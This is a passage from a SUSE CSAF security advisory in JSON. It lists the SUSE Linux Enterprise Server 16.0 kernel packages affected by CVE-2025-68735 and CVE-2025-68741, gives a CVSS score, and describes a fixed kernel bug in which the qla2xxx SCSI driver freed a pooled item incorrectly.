"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "important"
}
],
"title": "CVE-2025-68735"
},
{
"cve": "CVE-2025-68741",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68741"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Fix improper freeing of purex item\n\nIn qla2xxx_process_purls_iocb(), an item is allocated via\nqla27xx_copy_multiple_pkt(), which internally calls\nqla24xx_alloc_purex_item().\n\nThe qla24xx_alloc_purex_item() function may return a pre-allocated item\nfrom a per-adapter pool for small allocations, instead of dynamically\nallocating memory with kzalloc().\n\nAn error handling path in qla2xxx_process_purls_iocb() incorrectly uses\nkfree() to release the item. If the item was from the pre-allocated\npool, calling kfree() on it is a bug that can lead to memory corruption.\n\nFix this by using the correct deallocation function,\nqla24xx_free_purex_item(), which properly handles both dynamically\nallocated and pre-allocated items.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
